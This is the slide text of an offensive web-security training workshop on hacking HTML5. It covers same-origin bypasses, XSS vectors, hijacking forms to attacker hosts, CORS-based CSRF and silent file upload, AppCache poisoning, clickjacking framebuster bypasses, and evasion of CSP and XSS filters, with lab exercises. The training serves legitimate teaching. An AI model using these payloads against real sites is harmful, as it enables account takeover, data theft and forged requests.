Top Ten Web Hacking Techniques (2010)Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)
 
Browser Internals-Same Origin Policy
Browser Internals-Same Origin PolicyBrowser Internals-Same Origin Policy
Browser Internals-Same Origin Policy
 
CORS and (in)security
CORS and (in)securityCORS and (in)security
CORS and (in)security
 
TakeDownCon Rocket City: WebShells by Adrian Crenshaw
TakeDownCon Rocket City: WebShells by Adrian CrenshawTakeDownCon Rocket City: WebShells by Adrian Crenshaw
TakeDownCon Rocket City: WebShells by Adrian Crenshaw
 
Building Secure User Interfaces With JWTs
Building Secure User Interfaces With JWTsBuilding Secure User Interfaces With JWTs
Building Secure User Interfaces With JWTs
 
HTML5 vs Silverlight
HTML5 vs SilverlightHTML5 vs Silverlight
HTML5 vs Silverlight
 
JSFoo Chennai 2012
JSFoo Chennai 2012JSFoo Chennai 2012
JSFoo Chennai 2012
 
QA: Базовое тестирование защищенности веб-приложений в рамках QA
QA: Базовое тестирование защищенности веб-приложений в рамках QAQA: Базовое тестирование защищенности веб-приложений в рамках QA
QA: Базовое тестирование защищенности веб-приложений в рамках QA
 
Codefest2015
Codefest2015Codefest2015
Codefest2015
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications
 
02-browser-sec-model-sop.pptx
02-browser-sec-model-sop.pptx02-browser-sec-model-sop.pptx
02-browser-sec-model-sop.pptx
 
Attacking HTML5
Attacking HTML5Attacking HTML5
Attacking HTML5
 
Warning Ahead: SecurityStorms are Brewing in Your JavaScript
Warning Ahead: SecurityStorms are Brewing in Your JavaScriptWarning Ahead: SecurityStorms are Brewing in Your JavaScript
Warning Ahead: SecurityStorms are Brewing in Your JavaScript
 

More from Krzysztof Kotowicz

Trusted Types - Securing the DOM from the bottom up (JSNation Amsterdam)
Trusted Types - Securing the DOM from the bottom up (JSNation Amsterdam)Trusted Types - Securing the DOM from the bottom up (JSNation Amsterdam)
Trusted Types - Securing the DOM from the bottom up (JSNation Amsterdam)
Krzysztof Kotowicz
 
Trusted Types @ W3C TPAC 2018
Trusted Types @ W3C TPAC 2018Trusted Types @ W3C TPAC 2018
Trusted Types @ W3C TPAC 2018
Krzysztof Kotowicz
 
Trusted Types and the end of DOM XSS
Trusted Types and the end of DOM XSSTrusted Types and the end of DOM XSS
Trusted Types and the end of DOM XSS
Krzysztof Kotowicz
 
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.Biting into the forbidden fruit. Lessons from trusting Javascript crypto.
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.
Krzysztof Kotowicz
 
I'm in ur browser, pwning your stuff - Attacking (with) Google Chrome Extensions
I'm in ur browser, pwning your stuff - Attacking (with) Google Chrome ExtensionsI'm in ur browser, pwning your stuff - Attacking (with) Google Chrome Extensions
I'm in ur browser, pwning your stuff - Attacking (with) Google Chrome Extensions
Krzysztof Kotowicz
 
HTML5: Atak i obrona
HTML5: Atak i obronaHTML5: Atak i obrona
HTML5: Atak i obrona
Krzysztof Kotowicz
 
I'm in your browser, pwning your stuff
I'm in your browser, pwning your stuffI'm in your browser, pwning your stuff
I'm in your browser, pwning your stuff
Krzysztof Kotowicz
 
Advanced Chrome extension exploitation
Advanced Chrome extension exploitationAdvanced Chrome extension exploitation
Advanced Chrome extension exploitation
Krzysztof Kotowicz
 
Html5: Something wicked this way comes (Hack in Paris)
Html5: Something wicked this way comes (Hack in Paris)Html5: Something wicked this way comes (Hack in Paris)
Html5: Something wicked this way comes (Hack in Paris)
Krzysztof Kotowicz
 
Something wicked this way comes - CONFidence
Something wicked this way comes - CONFidenceSomething wicked this way comes - CONFidence
Something wicked this way comes - CONFidence
Krzysztof Kotowicz
 
Html5: something wicked this way comes
Html5: something wicked this way comesHtml5: something wicked this way comes
Html5: something wicked this way comes
Krzysztof Kotowicz
 
Creating, obfuscating and analyzing malware JavaScript
Creating, obfuscating and analyzing malware JavaScriptCreating, obfuscating and analyzing malware JavaScript
Creating, obfuscating and analyzing malware JavaScript
Krzysztof Kotowicz
 
Tworzenie, zaciemnianie i analiza złośliwego kodu JavaScript
Tworzenie, zaciemnianie i analiza złośliwego kodu JavaScriptTworzenie, zaciemnianie i analiza złośliwego kodu JavaScript
Tworzenie, zaciemnianie i analiza złośliwego kodu JavaScript
Krzysztof Kotowicz
 
Jak ocalić swoje dane przed SQL injection?
Jak ocalić swoje dane przed SQL injection?Jak ocalić swoje dane przed SQL injection?
Jak ocalić swoje dane przed SQL injection?
Krzysztof Kotowicz
 
SQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersSQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developers
Krzysztof Kotowicz
 
Kompletny przewodnik po SQL injection dla developerów PHP (i nie tylko)
Kompletny przewodnik po SQL injection dla developerów PHP (i nie tylko)Kompletny przewodnik po SQL injection dla developerów PHP (i nie tylko)
Kompletny przewodnik po SQL injection dla developerów PHP (i nie tylko)
Krzysztof Kotowicz
 

More from Krzysztof Kotowicz (16)

Trusted Types - Securing the DOM from the bottom up (JSNation Amsterdam)
Trusted Types - Securing the DOM from the bottom up (JSNation Amsterdam)Trusted Types - Securing the DOM from the bottom up (JSNation Amsterdam)
Trusted Types - Securing the DOM from the bottom up (JSNation Amsterdam)
 
Trusted Types @ W3C TPAC 2018
Trusted Types @ W3C TPAC 2018Trusted Types @ W3C TPAC 2018
Trusted Types @ W3C TPAC 2018
 
Trusted Types and the end of DOM XSS
Trusted Types and the end of DOM XSSTrusted Types and the end of DOM XSS
Trusted Types and the end of DOM XSS
 
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.Biting into the forbidden fruit. Lessons from trusting Javascript crypto.
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.
 
I'm in ur browser, pwning your stuff - Attacking (with) Google Chrome Extensions
I'm in ur browser, pwning your stuff - Attacking (with) Google Chrome ExtensionsI'm in ur browser, pwning your stuff - Attacking (with) Google Chrome Extensions
I'm in ur browser, pwning your stuff - Attacking (with) Google Chrome Extensions
 
HTML5: Atak i obrona
HTML5: Atak i obronaHTML5: Atak i obrona
HTML5: Atak i obrona
 
I'm in your browser, pwning your stuff
I'm in your browser, pwning your stuffI'm in your browser, pwning your stuff
I'm in your browser, pwning your stuff
 
Advanced Chrome extension exploitation
Advanced Chrome extension exploitationAdvanced Chrome extension exploitation
Advanced Chrome extension exploitation
 
Html5: Something wicked this way comes (Hack in Paris)
Html5: Something wicked this way comes (Hack in Paris)Html5: Something wicked this way comes (Hack in Paris)
Html5: Something wicked this way comes (Hack in Paris)
 
Something wicked this way comes - CONFidence
Something wicked this way comes - CONFidenceSomething wicked this way comes - CONFidence
Something wicked this way comes - CONFidence
 
Html5: something wicked this way comes
Html5: something wicked this way comesHtml5: something wicked this way comes
Html5: something wicked this way comes
 
Creating, obfuscating and analyzing malware JavaScript
Creating, obfuscating and analyzing malware JavaScriptCreating, obfuscating and analyzing malware JavaScript
Creating, obfuscating and analyzing malware JavaScript
 
Tworzenie, zaciemnianie i analiza złośliwego kodu JavaScript
Tworzenie, zaciemnianie i analiza złośliwego kodu JavaScriptTworzenie, zaciemnianie i analiza złośliwego kodu JavaScript
Tworzenie, zaciemnianie i analiza złośliwego kodu JavaScript
 
Jak ocalić swoje dane przed SQL injection?
Jak ocalić swoje dane przed SQL injection?Jak ocalić swoje dane przed SQL injection?
Jak ocalić swoje dane przed SQL injection?
 
SQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersSQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developers
 
Kompletny przewodnik po SQL injection dla developerów PHP (i nie tylko)
Kompletny przewodnik po SQL injection dla developerów PHP (i nie tylko)Kompletny przewodnik po SQL injection dla developerów PHP (i nie tylko)
Kompletny przewodnik po SQL injection dla developerów PHP (i nie tylko)
 

Hacking HTML5 offensive course (Zeronights edition)

  • 1. VirtualBox (~4 gb needed) shared folder - dir with upacked zeronights.zip NoVirtualBox? unpack zeronights.zip Apache + PHP Chrome + Firefox host root dir as //localvictim and //127.0.0.1 /evil dir as //evillogin:ubuntu, pass: ? http://10.10.0.1/ Hacking HTML5 Krzysztof Kotowicz ZeroNights 2013
  • 2. /whoami • I work at SecuRing and Cure53 • I do web security research • I present at cons (BlackHat, BRUCon, Hack In Paris, OWASP AppSec, CONFidence, ...) • @kkotowicz • blog.kotowicz.net Plan hacks = [ "Same Origin Policy — quirks, flavors & bypasses", "XSSing with HTML5 — twisted vectors & amazing exploits", "Exploiting Web Messaging", "Attacking with Cross Origin Resource Sharing", "Targeting Client side storage and Offline Cache Poisoning", "Using WebSockets for attacks", "Iframe sandboxing & clickjacking", "Bypassing Content Security Policy", "Webkit XSS Auditor & IE Anti-XSS filter — behind the scenes", ]
  • 3. Plan def plan(): ! general_intro() ! known = [js, xss, http, ..] ! for h in hacks: ! ! known.append(h) ! ! intro(h, short=True) ! ! attack_with(known) Disclaimer • Workshops highly practical • Firebug & similar tools knowledge assumed • Medium-to-hard tasks • Limited time - try at home! • Ask questions please! • Of course - use all this for educational purposes & doing legitimate stuff
  • 4. Lab setup • ubuntu:ubuntu • http://localvictim • http://evil • /home/ubuntu/Desktop/remote/ • evil/solutions Same Origin Policy quirks, flavors & bypasses
  • 5. Same Origin Policy • Security model for the web • Restrict communication between applications from different origins • Origin = scheme + host + port http://example.com/document http://example.com/other/document/here https://example.com/document https://www.example.com/document http://example.com:8080/document  Same Origin Policy • Multiple same origin policies - cookies, DOM access, Flash, Java, XMLHttpRequest • Different rules for policies • Multiple quirks
  • 6. SOP Bypass vs XSS • SOP bypass = read / write across origins • e.g. read DOM elements • set cookies •browser / specs bug • XSS - execute code on target origin •application bug SOP Quirks • Java applets • example.com === example.net • Shared hosting => SOP bypass $ host example.com example.com has address 93.184.216.119 $ host example.net example.net has address 93.184.216.119
  • 7. SOP Quirks • IE - port does not matter http://example.com:8080 == http://example.com/ • cookies: Any subdomain can set cookies to parent domains • microsoft.com must trust all *.microsoft.com sites SOP Quirks • cookie forcing - write arbitrary cookies •HTTPS • Set-Cookie: admin=false; secure • HTTP (man-in-the-middle) • Set-Cookie: admin=true; secure • Cookie: admin=true;
  • 8. SOP side-channels • window.name • setting location • traversing iframes • iframe height, scrolling positions • timing • SVG filters - http://www.contextis.com/files/ Browser_Timing_Attacks.pdf top.frames[1].frames[2].length top.frames[1].frames[2].location= <iframe name="yup.anything!you()want"> window.open('a_name') Practice! • http://localvictim/01-sop/1/ • alert ‘secret’ value • http://localvictim/01-sop/2/ • detect if user is logged in or not (x-domain) • * http://localvictim/01-sop/1/index2.php • alert ‘secret’ value
  • 9. XSSing with HTML5 twisted vectors & amazing exploits XSS in HTML5 <input|button autofocus> <math> <maction actiontype="statusline" xlink:href="javascript:alert(3)">CLICKME <mtext>http://google.com</mtext> </maction> </math> <input oninput=alert(1) autofocus> <div style="height:30px;overflow:scroll" onscroll=alert(1)>.......</div>
  • 10. XSS in HTML5 • Interesting form based vectors: • Send form to your server • Change target window • Change encoding <form id="f"> ... <button form=f formaction=//evil.me formtarget=...> <button form=f type=submit> XSS in HTML5 <form id=f action=https://benign.com> <input name=secret> </form> // anywhere in the document - notice no JS! <button form=f formaction=http://bad.ru>CLICK </button>
  • 11. XSS in HTML5 • Data: URIs • Evade filters data:[<MIME-type>][;charset=<charset>][;base64],<data> <a href=”data:text/html, <script>alert(1)</script>”>XSS</a> <a href=”data:text/html;base64, PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==”> btoa() XSS in HTML5 • HTML5 helps with the exploitation • WebSockets connection with C&C • Extract local DB, geolocation, HTML5 filesystem • • // stealth mode history.pushState('/innocent-url') // persistence localStorage['code']='alert(/delayed/)'; // months later eval(localStorage['code'])
  • 12. Practice! • http://localvictim/02-xss/ • alert one • * send csrf token to //evil Exploiting Web Messaging
  • 13. Web Messaging Web browsers, for security and privacy reasons, prevent documents in different domains from affecting each other; that is, cross-site scripting is disallowed. While this is an important security feature, it prevents pages from different domains from communicating even when those pages are not hostile.This section introduces a messaging system that allows documents to communicate with each other regardless of their source domain, in a way designed to not enable cross-site scripting attacks. http://www.w3.org/TR/webmessaging/ Web Messaging • ...designed not to enable XSS • http://html5demos.com/ postmessage2
  • 14. Web Messaging • client-side window-to-window communication • no server, no TCP traffic! • cross domain by default Web Messaging <html> // my.domain <iframe src=//other.domain/widget></iframe> // sender var w = frameElement.contentWindow; var wOrigin = 'http://example.com'; // or "*" w.postMessage('hi!', wOrigin); // receiver window.addEventListener("message", function(e) { if (e.origin !== "http://example.com") { alert('Ignoring ' + e.origin); } else { alert(e.origin + " said: " + e.data); } }, false);
  • 15. Web Messaging bugs // frame could get replaced, you're sending to attacker!!! frame.postMessage({secret:stuff}, "*"); window.addEventListener("message", function(e) { ! // no sender validation ! do_stuff_with(e.data); ! // are you kidding me?? ! div.innerHTML = e.data; } Practice! • http://localvictim/03-messaging/ • XSS the victim • * hijack the contents of an email when user enters it
  • 16. Attacking with Cross Origin Resource Sharing CORS • Cross domain XHR, with credentials: • cookies • SSL/TLS client certificate • HTTP auth credentials • Target server decides to allow/forbid
  • 17. Classic XHR • In domain only CORS • Cross-domain allowed
  • 18. CORS • XHR request reaches the target server • With appropriate credentials • Can be abused for Cross Site Request Forgery CORS // http://attacker.cn var xhr = new XMLHttpRequest(); xhr.open("POST", "http://victim.ch"); xhr.setRequestHeader("Content-Type", "text/ plain"); xhr.withCredentials = "true"; // cookies etc. xhr.send("Anything");
  • 19. CORS on the wire Simple request GET /data/ HTTP/1.1 Host: target.example Origin: http://src.example … HTTP/1.1 200 OK Date: Mon, 01 Dec 2008 00:23:53 GMT Server: Apache/2.0.61 Access-Control-Allow-Origin: http://src.example Content-Type: application/json {"secret-data":xxxxxx} CORS on the wire preflight OPTIONS /data/ HTTP/1.1 Host: target.example Origin: http://src.example Access-Control-Request-Method: POST Access-Control-Request-Headers: X-MyHeader … HTTP/1.1 200 OK Access-Control-Allow-Origin: http://src.example Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: X-MyHeader Access-Control-Max-Age: 1728000
  • 20. CORS on the wire preflight POST /data/ HTTP/1.1 Host: target.example Origin: http://src.example Content-Type: text/xml; charset=UTF-8 Content-Length: xxx X-MyHeader: apikey=23423423 <?xml ..... … HTTP/1.1 200 OK Access-Control-Allow-Origin: http://src.example Content-Type: text/plain ok CORS - weaknesses • Again, wildcards: • Access-Control-Allow-Origin: * = everybody can read me • A-C-A-O: <sender-origin> is even worse • You can use CORS to send arbitrary blind requests (CSRF) • What if receiver is malicious?
  • 21. Silent file upload Content-Type: multipart/form-data; boundary=AaB03x --AaB03x Content-Disposition: form-data; name="submit-name" Larry --AaB03x Content-Disposition: form-data; name="files"; filename="file1.txt" Content-Type: text/plain ... contents of file1.txt ... --AaB03x-- xhr.send("Anything"); Silent file upload xhr.setRequestHeader("Content-Type", "multipart/form-data, boundary=xxx"); xhr.send(' --xxxrn Content-Disposition: form-data; name="files"; filename="file1.txt"rn Content-Type: text/plainrn rn ANYTHINGrn --xxx--');
  • 22. Silent file upload • Simulates multipart/form-data request with <input type=file> upload • Already used to: • Replace firmware in routers • Take control of application servers logUrl = 'http://glassfishserver/ management/domain/applications/ application'; fileUpload(c,"maliciousarchive.war"); Content injection • http://website/#/a/page • https://touch.facebook.com/#http:// example.com/xss.php HTTP/1.1 200 OK Access-Control-Allow-Origin: * Content-Type: text/html <img src=x onerror=alert(1)> xhr.open("GET", "/a/page");
  • 23. Practice! • http://localvictim/04-cors/ • XSS the victim and alert his user ID Targeting Client side storage & Offline Cache Poisoning
  • 24. AppCache • HTML pages can specify a manifest URL • Manifest • text/cache-manifest MIME type • Lists URLs that should be fetched and stored <html manifest=/cache.manifest> Man in the middle • Eavesdrop / modify traffic • XSS • session hijack (Firesheep) • Doesn’t last long
  • 25. AppCache poison 1. During MITM: inject poison 2. After MITM: • robots.txt has invalid MIME type • poisoned page fetched from cache • code runs until offline cache is purged <html manifest="/robots.txt"> ....<script>evil_foo()</script> CACHE MANIFEST CACHE: http://victim/ NETWORK: * Demo! • http://localvictim/05-offline/ • perform offline attack with sslstrip • google-chrome --proxy-server=http://evil:10000 • payload: alert login & password
  • 26. Using WebSockets for attacks WebSockets • 2-way TCP connection from browser to server • bandwidth efficient • asynchronous - no request / response model • available to JS
  • 27. WebSockets • Handshake similar to HTTP • Optionally encrypted with TLS (wss://) • Dumb protocol • No user authorization • No user authentication WebSockets if (window.WebSocket) { var url = 'ws://host:port/path' ,s = new WebSocket(url); s.onopen = function(e) {}; s.onclose = function(e) {}; s.onmessage = function(e) { // e.data - server sent data }; s.send('hello server!'); }
  • 28. WebSockets security • Attack app-level protocols • look for DoS, auth flaws • Sometimes plain TCP services are tunneled over WebSockets • You can attack servers with: • browser - xss • browser - third party website • custom client Demo! • cd /home/ubuntu/Desktop/remote/06- websockets/websockify-master • ./run.sh • http://localvictim/06-websockets/ • login into ws://localvictim:9999 user ‘admin’ • * extract flag from admin home dir
  • 29. Iframe sandboxing & clickjacking Clickjacking • You all know it. • Don’t get framed • Lots of websites use: if (self !== top) { ! top.location = self.location; }
  • 30. Clickjacking - bypass // evil framing victim wanting to jump out of frame var kill_bust = 0 window.onbeforeunload = function(){kill_bust++}; setInterval(function() { if (kill_bust > 0) { kill_bust -= 2; top.location = '204.php'; }}, 1); // basically, a race condition on top reload Clickjacking w/ HTML5 • IFRAME sandbox restricts what a frame can do • no allow-top-navigation => top.location.href = .... fails <iframe src="http://victim.com" sandbox=" allow-forms allow-scripts" />
  • 31. Practice! • http://localvictim/07-clickjacking/ • clickjack “Delete my account” button Bypassing Content Security Policy
  • 32. CSP • whitelist content on your website with HTTP headers e.g. • Mitigate XSS by forbidding inline scripting • Only allow images from your CDN • Only allow XHR to your API server CSP Content-Security-Policy: default-src: 'none'; style-src: https://my.cdn.net; script-src: 'self' https://ssl.google-analytics.com; img-src: 'self' https://images.cdn.net; report-uri: https://my.com/violations
  • 33. CSP • It’s XSS mitigation, XSS is still possible via obscure vectors • <iframe src=”filesystem://...> • Chrome Extensions • JSONP CSP • You can do much even without XSS • http://lcamtuf.coredump.cx/postxss/ • content extraction - unclosed elements: <img src=’..........<something>......’<else> • other - http://ruxcon.org.au/assets/slides/ CSP-kuza55.pptx
  • 34. CSP • Still fresh concept & rapid development • Fresh scary bugs • https://bugzilla.mozilla.org/show_bug.cgi? id=886164 • Practice! • http://localvictim/08-csp/1.php • send CSRF token to //evil • * http://localvictim/08-csp/2.php • XSS (Firefox). If in Chrome, contact me ;)
  • 35. Browser XSS filters behind the scenes Browser XSS filters • Detect dangerous patterns in HTTP request parameters (GET/POST) • Observe for reflection in HTTP response • Neutralize injection or block entire page • X-Xss-Protection: 0|1
  • 36. Browser XSS filters Browser XSS filters IE8 <[i]?f{r}ame.*?[ /+t]*?src[ /+t]* (j|(&[#()=]x?0*((74)|(4A)|(106)|(6A));?))([t]|(&[#()=]x?0*(9|(13)|(10)|A| D);?))*(a|(&[#()=]x?0*((65)|(41)|(97)|(61));?))([t]|(&[#()=]x?0*(9|(13)|( 10)|A|D);?))*(v|(&[#()=]x?0*((86)|(56)|(118)|(76));?))([t]|(&[#()=]x?0*(9 |(13)|(10)|A|D);?))*(a|(&[#()=]x?0*((65)|(41)|(97)|(61));?))([t]|(&[#()=] x?0*(9|(13)|(10)|A|D);?))*(s|(&[#()=]x?0*((83)|(53)|(115)|(73));?))([t]|( &[#()=]x?0*(9|(13)|(10)|A|D);?))*(c|(&[#()=]x?0*((67)|(43)|(99)|(63));?))( [t]|(&[#()=]x?0*(9|(13)|(10)|A|D);?))*{(r|(&[#()=]x?0*((82)|(52)|(114)|(7 2));?))}([t]|(&[#()=]x?0*(9|(13)|(10)|A|D);?))*(i|(&[#()=]x?0*((73)|(49)| (105)|(69));?))([t]|(&[#()=]x?0*(9|(13)|(10)|A|D);?))*(p|(&[#()=]x?0*((80 )|(50)|(112)|(70));?))([t]|(&[#()=]x?0*(9|(13)|(10)|A|D);?))*(t|(&[#()=]x ?0*((84)|(54)|(116)|(74));?))([t]|(&[#()=]x?0*(9|(13)|(10)|A|D);?))*(:|(& [#()=]x?0*((58)|(3A));?)).
  • 37. Browser XSS filters Chrome • complex rules, discovers different contexts, tries to decode etc. • http://src.chromium.org/viewvc/blink/trunk/ Source/core/html/parser/XSSAuditor.cpp? revision=HEAD&view=markup • Bypasses every other month Browser XSS filters tricks • Use to disable benign scripts (e.g. framebusters) • Only GET / POST matched => use cookies • Multiple param injections = you always win
  • 38. Browser XSS filters ASP.NET tricks • http://soroush.secproject.com/blog/ 2012/06/browsers-anti-xss-methods-in-asp- classic-have-been-defeated/ • concatenation: input1=a&input1=b => a,b • truncation:anything after %00 ignored • transliteration: %u0117 => ė => e Practice! • http://localvictim/09-antixss/1.php • * http://localvictim/09-antixss/irl.php • * http://www.sdl.me/xssdemo/getxss.asp • XSS’em all (Chrome)!
  • 39. That is all. thx. q&a? Liked that? //blog.kotowicz.net